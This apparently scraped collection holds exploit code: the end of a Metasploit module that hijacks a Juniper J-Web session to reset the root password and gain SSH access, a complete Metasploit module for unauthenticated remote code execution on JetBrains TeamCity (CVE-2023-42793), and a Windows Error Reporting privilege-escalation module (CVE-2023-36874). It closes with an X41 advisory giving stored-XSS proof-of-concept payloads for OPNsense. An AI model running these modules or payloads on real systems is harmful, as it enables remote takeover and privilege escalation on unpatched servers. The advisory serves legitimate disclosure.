'vars_get' => {<br /> 'action' => 'commit'<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")<br /> end<br /> print_status("Successfully changed the root user's password ")<br /> end<br /><br /> def ssh_login<br /> ssh_opts = ssh_client_defaults.merge({<br /> port: datastore['SSH_PORT'],<br /> auth_methods: ['password'],<br /> password: datastore['TMP_ROOT_PASSWORD']<br /> })<br /><br /> begin<br /> ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> Net::SSH.start(rhost, 'root', ssh_opts)<br /> end<br /> rescue Net::SSH::Exception => e<br /> vprint_error("#{e.class}: #{e.message}")<br /> return nil<br /> end<br /><br /> if ssh<br /> Net::SSH::CommandStream.new(ssh)<br /> end<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :nix_stream<br /> print_status("Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.")<br /> print_warning("This requires a user is authenticated to the J-Web application in order to steal a session token, also 'ssh root-login' is set to 'allow' on the device")<br /> php_session_id = get_php_session_id<br /> csrf_token = get_csrf_token(php_session_id)<br /> @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)<br /> tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])<br /> print_status "Temporary root password Hash: #{tmp_password_hash}"<br /> set_root_password(php_session_id, csrf_token, tmp_password_hash)<br /><br /> if (ssh = ssh_login)<br /> print_good('Logged in as root')<br /> handler(ssh.lsock)<br /> end<br /><br /> set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass)<br /><br /> when :php_memory<br /> send_php_exploit('/dev/fd/0', payload.encoded)<br /> else<br /> fail_with(Failure::BadConfig, 'Please select a valid target.')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Retry<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution<br /> against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are<br /> vulnerable to this issue. The vulnerability was originally discovered by SonarSource.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-42793'],<br /> ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'],<br /> ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/']<br /> ],<br /> 'DisclosureDate' => '2023-09-19',<br /> 'Platform' => %w[win linux],<br /> 'Arch' => [ARCH_CMD],<br /> 'Payload' => { 'Space' => 1024 },<br /> 'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.<br /> 'Targets' => [<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win'<br /> }<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Platform' => 'linux'<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> # By default TeamCity listens for HTTP requests on TCP port 8111.<br /> Opt::RPORT(8111),<br /> # The first user created during installation is an administrator account, so the ID will be 1.<br /> OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),<br /> # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.<br /> OptInt.new('TEAMCITY_CHANGE_TIMEOUT', [true, 'The timeout to wait for the changes to be applied', 30])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/login.html'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # We expect a TeamCity server to respond with either a "TeamCity-Node-Id" header value or a cookie named "TCSESSIONID".<br /> # In the responses HTML body will be a string containing the release name and build version.<br /> if (res.headers.key?('TeamCity-Node-Id') || res.get_cookies.include?('TCSESSIONID')) && (res.body =~ /(\d+\.\d+\.\d+) \(build (\d+)\)/)<br /> detected = "JetBrains TeamCity #{::Regexp.last_match(1)} (build #{::Regexp.last_match(2)}) detected."<br /><br /> # The vulnerability was patched in release 2023.05.4 (build 129421) so anything before this build is vulnerable.<br /> if ::Regexp.last_match(2).to_i < 129421<br /> return CheckCode::Vulnerable(detected)<br /> end<br /><br /> return CheckCode::Safe(detected)<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(token_uri)<br /> )<br /><br /> # A token named 'RPC2' may already exist if this system has been exploited before and previous exploitation<br /> # did not delete teh token after use. We detect that here, delete the token (as we dont know its value) if required<br /> # and then proceed to create a new token for our use.<br /> if res && (res.code == 400) && res.body.include?('Token already exists')<br /><br /> print_status('Token already exists, deleting and generating a new one.')<br /><br /> unless delete_token(token_uri)<br /> fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(token_uri)<br /> )<br /> end<br /><br /> unless res&.code == 200<br /> # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here<br /> # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.<br /> if res && (res.code == 404) && res.body.include?('User not found')<br /> print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')<br /> end<br /><br /> begin<br /> token = Nokogiri::XML(res.body).xpath('/token')&.attr('value').to_s<br /><br /> print_status("Created authentication token: #{token}")<br /><br /> print_status('Modifying internal.properties to allow process creation...')<br /><br /> unless modify_internal_properties(token, 'rest.debug.processes.enable', 'true')<br /> fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')<br /> end<br /><br /> begin<br /> print_status('Executing payload...')<br /><br /> vars_get = {}<br /><br /> # We need to supply multiple params with the same name, so the TeamCity server (A Java Spring framework) can<br /> # construct a List<String> sequence for multiple parameters. We can do this be enabling `compare_by_identity`<br /> # in the Ruby Hash.<br /> vars_get.compare_by_identity<br /><br /> case target['Platform']<br /> when 'win'<br /> vars_get['exePath'] = 'cmd.exe'<br /> vars_get['params'] = '/c'<br /> vars_get['params'] = payload.encoded<br /> when 'linux'<br /> vars_get['exePath'] = '/bin/sh'<br /> vars_get['params'] = '-c'<br /> vars_get['params'] = payload.encoded<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri('/app/rest/debug/processes'),<br /> 'uri_encode_mode' => 'hex-all', # we must encode all characters in the query param for the payload to work.<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}",<br /> 'Content-Type' => 'text/plain'<br /> },<br /> 'vars_get' => vars_get<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Failed to execute arbitrary process.')<br /> end<br /> ensure<br /> print_status('Resetting the internal.properties settings...')<br /><br /> unless modify_internal_properties(token, 'rest.debug.processes.enable', nil)<br /> fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')<br /> end<br /> end<br /> ensure<br /> print_status('Deleting the authentication token.')<br /><br /> unless delete_token(token_uri)<br /> fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')<br /> end<br /> end<br /> end<br /><br /> def delete_token(token_uri)<br /> res = send_request_cgi(<br /> 'method' => 'DELETE',<br /> 'uri' => normalize_uri(token_uri),<br /> 'headers' => {<br /> 'Connection' => 'close'<br /> }<br /> )<br /><br /> res&.code == 204<br /> end<br /><br /> def modify_internal_properties(token, key, value)<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri('/admin/dataDir.html'),<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}"<br /> },<br /> 'vars_get' => {<br /> 'action' => 'edit',<br /> 'fileName' => 'config/internal.properties',<br /> 'content' => value ? "#{key}=#{value}" : ''<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The<br /> # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.<br /> if res&.code == 302<br /> print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')<br /> end<br /><br /> return false<br /> end<br /><br /> print_status('Waiting for configuration change to be applied...')<br /> retry_until_truthy(timeout: datastore['TEAMCITY_CHANGE_TIMEOUT']) do<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri('/admin/admin.html'),<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}",<br /> 'Accept' => '*/*'<br /> },<br /> 'vars_get' => {<br /> 'item' => 'diagnostics',<br /> 'tab' => 'properties'<br /> }<br /> )<br /><br /> res&.code == 200 && res.body.include?(key)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Common<br /> include Msf::Post::File<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::Windows::Priv<br /> include Msf::Exploit::EXE<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',<br /> 'Description' => %q{<br /> This module takes advantage of a bug in the way Windows error reporting opens the report<br /> parser. If you open a report, Windows uses a relative path to locate the rendering program.<br /> By creating a specific alternate directory structure, we can coerce Windows into opening an<br /> arbitrary executable as SYSTEM.<br /> If the current user is a local admin, the system will attempt impersonation and the exploit will<br /> fail.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Filip Dragović (Wh04m1001)', # PoC<br /> 'Octoberfest7', # PoC<br /> 'bwatters-r7' # msf module<br /> ],<br /> 'Platform' => ['win'],<br /> 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],<br /> 'Targets' => [<br /> [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-07-11',<br /> 'References' => [<br /> ['CVE', '2023-36874'],<br /> ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],<br /> ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],<br /> ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK ]<br /> },<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_fs_delete_file<br /> stdapi_sys_config_getenv<br /> ]<br /> }<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('EXPLOIT_NAME',<br /> [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),<br /> OptString.new('REPORT_DIR',<br /> [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),<br /> OptString.new('SHADOW_DRIVE',<br /> [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),<br /> OptInt.new('EXECUTE_DELAY',<br /> [true, 'The number of seconds to delay between file upload and exploit launch', 3])<br /> ])<br /> end<br /><br /> # When we pass the directory value to the mkdir method, the mkdir method<br /> # passes the reference to the string containing the directory.<br /> # We do a lot of string manipulation in this module, so this is a quick<br /> # hack to make sure that despite what we do with the string after we create<br /> # the directory, it is the actual directory we created that gets sent to<br /> # the cleanup methods.<br /> def clone_mkdir(dir)<br /> mkdir(dir.clone)<br /> end<br /><br /> def upload_error_report<br /> wer_archive_dir = get_env('PROGRAMDATA')<br /> vprint_status(wer_archive_dir)<br /> wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'<br /> report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"<br /> report_filename = "#{report_dir}\\Report.wer"<br /> vprint_status("Creating #{report_dir}")<br /> clone_mkdir(report_dir)<br /> wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')<br /> vprint_status("Writing Report to #{report_filename}")<br /> write_file(report_filename, wer_report_data)<br /> end<br /><br /> def build_shadow_archive_dir(shadow_base_dir)<br /> wer_archive_dir = shadow_base_dir<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << '\\ProgramData\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'Microsoft\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'Windows\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'WER\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'ReportArchive\\'<br /> clone_mkdir(wer_archive_dir)<br /> report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"<br /> clone_mkdir(report_dir)<br /> return report_dir<br /> end<br /><br /> def upload_shadow_report(shadow_archive_dir)<br /> report_filename = "#{shadow_archive_dir}\\Report.wer"<br /> wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')<br /> vprint_status("Writing bad Report to #{report_filename}")<br /> write_file(report_filename, wer_report_data)<br /> end<br /><br /> def build_shadow_system32(shadow_base_dir)<br /> shadow_win32 = "#{shadow_base_dir}\\system32"<br /> vprint_status("Creating #{shadow_win32}")<br /> clone_mkdir(shadow_win32)<br /> return shadow_win32<br /> end<br /><br /> def upload_payload(shadow_win32)<br /> payload_bin = generate_payload_exe<br /> payload_filename = "#{shadow_win32}\\wermgr.exe"<br /> vprint_status("Writing payload to #{payload_filename}")<br /> write_file(payload_filename, payload_bin)<br /> end<br /><br /> def upload_execute_exploit(exploit_path, shadow_path, home_dir)<br /> vprint_status("shadow_path = #{shadow_path}")<br /> exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')<br /> write_file(exploit_path, exploit_bin)<br /> sleep datastore['EXECUTE_DELAY']<br /> vprint_status("Exploit uploaded to #{exploit_path}")<br /> cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"<br /> output = cmd_exec(cmd, nil, 30)<br /> vprint_status(output)<br /> end<br /><br /> def check<br /> # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.<br /> version = get_version_info<br /> vprint_status("OS version: #{version}")<br /> return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2<br /><br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?<br /> fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?<br /> shadow_dir = datastore['SHADOW_DRIVE']<br /> home_dir = get_env('HOMEDRIVE')<br /> shadow_path = "#{home_dir}\\#{shadow_dir}"<br /> vprint_status("Shadow Path = #{shadow_path}")<br /> upload_error_report<br /> shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)<br /> upload_shadow_report(shadow_archive_dir)<br /> shadow_system32 = build_shadow_system32(shadow_path.dup)<br /> upload_payload(shadow_system32)<br /> sleep datastore['EXECUTE_DELAY']<br /> exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"<br /> exploit_path << '.exe' unless exploit_path[-4..] == '.exe'<br /> if shadow_dir.length > 64<br /> fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')<br /> end<br /> upload_execute_exploit(exploit_path, shadow_dir, home_dir)<br /> print_warning("Manual deletion of #{shadow_path} may be required")<br /> end<br />end<br /></code></pre>
<pre><code><br />Advisory X41-2023-001: Two Vulnerabilities in OPNsense<br />===========================================================<br />Highest Severity Rating: High<br />Confirmed Affected Versions: 23.1.11_1, 23.7.3, 23.7.4<br />Confirmed Patched Versions: Commit 484753b2abe3fd0fcdb73d8bf00c3fc3709eb8b7<br />Vendor: Deciso B.V. / OPNsense<br />Vendor URL: https://opnsense.org<br />Credit: X41 D-Sec GmbH, Yasar Klawohn and JM<br />Status: Public <br />Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2023-001-opnsense<br /><br /><br />Summary and Impact<br />------------------<br />The OPNsense dashboard displays widgets with information about the system,<br />running services, gateways and more. These widgets can be arranged in<br />different orders and columns. The values for the number of columns and the<br />order of widgets are stored server-side and are the same for all users of an<br />OPNsense instance. They are reflected unmodified on every visit. This can be<br />abused by a low-privileged attacker to inject their own content into the<br />page, enabling a cross-site scripting (XSS) attack that can result in<br />privilege escalation.<br /><br /><br />Product Description<br />-------------------<br />OPNsense is an open source, FreeBSD-based firewall and routing operating<br />system. It includes many features of commercial firewalls and can be managed<br />entirely via its web GUI.<br /><br /><br />Stored XSS in the OPNsense Dashboard via the column_count Parameter<br />===================================================================<br />Severity Rating: High<br />Vector: Network<br />CWE: 79<br />CVSS Score: 8.0<br />CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />Credit: X41 D-Sec GmbH, Yasar Klawohn<br /><br /><br />Analysis<br />--------<br />The number of columns displayed in the dashboard is set via an HTTP POST<br />request to /index.php, using the column_count request parameter. This<br />parameter is not properly escaped when returned to the client. To exploit<br />this issue, the payload "><script>alert(1)</script> is submitted as part of<br />the column_count parameter. This input is reflected unmodified in the<br />response and on any subsequent visit to the dashboard by any user. Only the<br />"Lobby: Login / Logout / Dashboard" permission is required to abuse this<br />issue.<br /><br />Once the server receives the POST request, the column_count parameter is<br />written unmodified into the configuration:<br /><br />} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])<br /> && $_POST['origin'] == 'dashboard') {<br /> // ...<br /> if (!empty($_POST['column_count'])) {<br /> $config['widgets']['column_count'] = $_POST['column_count'];<br /> } elseif(isset($config['widgets']['column_count'])) {<br /> unset($config['widgets']['column_count']);<br /> }<br /> write_config('Widget configuration has been changed');<br /> header(url_safe('Location: /index.php'));<br /> exit;<br />}<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L66-L79<br /><br />If the column_count parameter is not empty, it is used unmodified: <br /><br />// ...<br />if ($_SERVER['REQUEST_METHOD'] === 'GET') {<br /> $pconfig = $config['widgets'];<br /> // ...<br /> $pconfig['column_count'] =<br /> !empty($pconfig['column_count']) ? $pconfig['column_count'] : 2;<br /> // ...<br />// from:<br />// https://github.com/opnsense/core/blob/306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L42<br /><br />Below, the unmodified value is written:<br /><br /><!-- ... --><br /><section class="page-content-main"><br /> <form method="post" id="iform"><br /> <input type="hidden" value="dashboard" name="origin" id="origin" /><br /> <input type="hidden" value="" name="sequence" id="sequence" /><br /> <input type="hidden" value="<?= $pconfig['column_count'];?>"<br /> name="column_count" id="column_count_input" /><br /> </form><br /><!-- ... --><br /><!-- from:<br />https://github.com/opnsense/core/blob/306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L332<br />--><br /><br />Proof of Concept<br />----------------<br />Log in as root. On the left side, go to System -> Access -> Users, and add a<br />new user. For "Effective Privileges", only select "Lobby: Login / Logout /<br />Dashboard". The user is now only able to view the dashboard and the help<br />pages.<br /><br />Log in as that newly created user and open your browser's network monitor.<br />In the OPNsense dashboard, select "1 column" from the top right and then<br />press "save settings". Repeat the POST request and replace the column_count<br />variable with<br /><br />column_count=1"><script>alert(1)</script><br /><br />Now, log in as admin again, you should see an alert box resulting from the<br />following HTML response:<br /><br /><form method="post" id="iform"><br /> <!-- .. --><br /> <input type="hidden" value="1"><br /> <script>alert(1)</script>"<br /> name="column_count" id="column_count_input" /><br /></form><br /><br />This is the stored XSS and can result in privilege escalation. The OPNsense<br />developers did apply a Content-Security-Policy, but unfortunately allow<br />unsafe-inline and unsafe-eval for scripts, which does not prevent the<br />exploitation of this vulnerability.<br /><br /><br />Stored XSS in the OPNsense Dashboard via the sequence Parameter<br />===============================================================<br />Severity Rating: High <br />Vector: Network<br />CWE: 79<br />CVSS Score: 8.0<br />CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />Credit: X41 D-Sec GmbH, JM and Yasar Klawohn<br /><br /><br />Analysis<br />--------<br />The order in which the widgets are displayed in the Dashboard is set via an<br />HTTP POST request to /index.php, using the sequence request parameter. This<br />parameter is not properly escaped when returned to the client. To exploit<br />this issue, the payload "><script>alert(1)</script> is submitted as part of<br />the sequence parameter. This input is reflected unmodified in the response<br />and on any subsequent visit to the dashboard by any user. Only the "Lobby:<br />Login / Logout / Dashboard" permission is required to abuse this issue.<br /><br />The order in which widgets are displayed on the dashboard can be set in the<br />same POST request, via the sequence parameter. The sequence parameter has the<br />following format:<br /><br />sequence=services_status-container:00000000-col3:show,<br /> interface_list-container:00000001-col4:show,<br /> gateways-container:00000002-col4:show<br /><br />Once the server receives the POST request, the sequence parameter is written<br />unmodified into the configuration:<br /><br />} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])<br /> && $_POST['origin'] == 'dashboard') {<br /> if (!empty($_POST['sequence'])) {<br /> $config['widgets']['sequence'] = $_POST['sequence'];<br /> } elseif (isset($config['widgets']['sequence'])) {<br /> unset($config['widgets']['sequence']);<br /> }<br /> // ...<br /> write_config('Widget configuration has been changed');<br /> header(url_safe('Location: /index.php'));<br /> exit;<br />}<br />// from:<br />// https://github.com/opnsense/core/blob/cbaf7cee1f0a6fabd1ec4c752a5d169c402976dc/src/www/index.php#L66-L80<br /><br />When serving a GET request, the sequence parameter is returned unmodified,<br />starting with a read of its value from the configuration:<br /><br />// ...<br />$pconfig = $config['widgets'];<br />// set default dashboard view<br />$pconfig['sequence'] = !empty($pconfig['sequence']) ?<br /> $pconfig['sequence'] : '';<br />// ...<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L39-L41<br /><br />sequence is then split by comma and further split by colon into name,<br />sortKey, and state. The list of widgets is sorted on the server side using<br />the sortKey.<br /><br />$widgetSeqParts = explode(",", $pconfig['sequence']);<br />foreach (glob('/usr/local/www/widgets/widgets/*.widget.php') as $php_file) {<br /> $widgetItem = array();<br /> // [...]<br /> foreach ($widgetSeqParts as $seqPart) {<br /> $tmp = explode(':', $seqPart);<br /> if (count($tmp) == 3 &&<br /> explode('-', $tmp[0])[0] == $widgetItem['name']<br /> ) {<br /> $widgetItem['state'] = $tmp[2];<br /> $widgetItem['sortKey'] = $tmp[1];<br /> }<br /> }<br /> $widgetCollection[] = $widgetItem;<br />}<br />// sort widgets<br />usort($widgetCollection, function ($item1, $item2) {<br /> return strcmp(strtolower($item1['sortKey']),<br /> strtolower($item2['sortKey']));<br />});<br />// from:<br />// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L44-L65<br /><br />Finally, the sortKey is written unescaped into an HTML attribute:<br /><br /><section<br /> class="widgetdiv"<br /> data-sortkey="<?=$widgetItem['sortKey'] ?>"<br /> id="<?=$widgetItem['name'];?>"<br /> style="display:<?=$divdisplay;?>;"<br /><!-- from:<br />https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L374<br />--><br /><br /><br />Proof of Concept<br />----------------<br />Log in as root. On the left side, go to System -> Access -> Users, and add a<br />new user. For "Effective Privileges", only select "Lobby: Login / Logout /<br />Dashboard". The user is now only able to view the dashboard and the help<br />pages.<br /><br />Log in as that newly created user and open your browser's network monitor. In<br />the OPNsense dashboard, reorder the widgets via drag-and-drop, then press<br />"save settings".<br /><br />Repeat the POST request and replace the sequence variable with<br /><br />sequence=gateways-container:1"><script>alert(1)</script>-col4:show<br /><br />Now, log in as admin again, you should see an alert box resulting from the<br />following HTML response:<br /><br /><div class="container-fluid"><br /> <!-- ... --><br /> <section class="widgetdiv" data-sortkey="1"><br /> <script>alert(2)</script><br /> -col4" id="gateways" style="display:block;"><br /><br />This is the stored XSS and can result in privilege escalation.<br /><br />The OPNsense developers did apply a Content-Security-Policy, but<br />unfortunately allow unsafe-inline and unsafe-eval for scripts, which does not<br />prevent the exploitation of this vulnerability.<br /><br /><br />Workarounds<br />===========<br /><br />Remove all effective privileges for /index.php* of low-privilege users.<br /><br />Timeline<br />========<br />2023-09-13: Problem discovered<br /><br />2023-09-14: Write-up and discovery of second finding<br /><br />2023-09-19: Disclosure to Deciso B.V. / OPNsense<br /><br />2023-09-19: Issue fixed upstream by Deciso B.V. / OPNsense<br /><br />2023-09-20: CVE requested<br /><br />2023-09-20: Informed Deciso B.V. / OPNsense that we will make the issues<br />public the following day, since the patch is public<br /><br />2023-09-21: Release of advisory<br /><br /><br />About X41 D-Sec GmbH<br />====================<br />X41 is an expert provider for application security services.<br />Having extensive industry experience and expertise in the area of information<br />security, a strong core security team of world class security experts enables<br />X41 to perform premium security services.<br /><br />Fields of expertise in the area of application security are security centered<br />code reviews, binary reverse engineering and vulnerability discovery.<br />Custom research and IT security consulting and support services are core<br />competencies of X41.<br /></code></pre>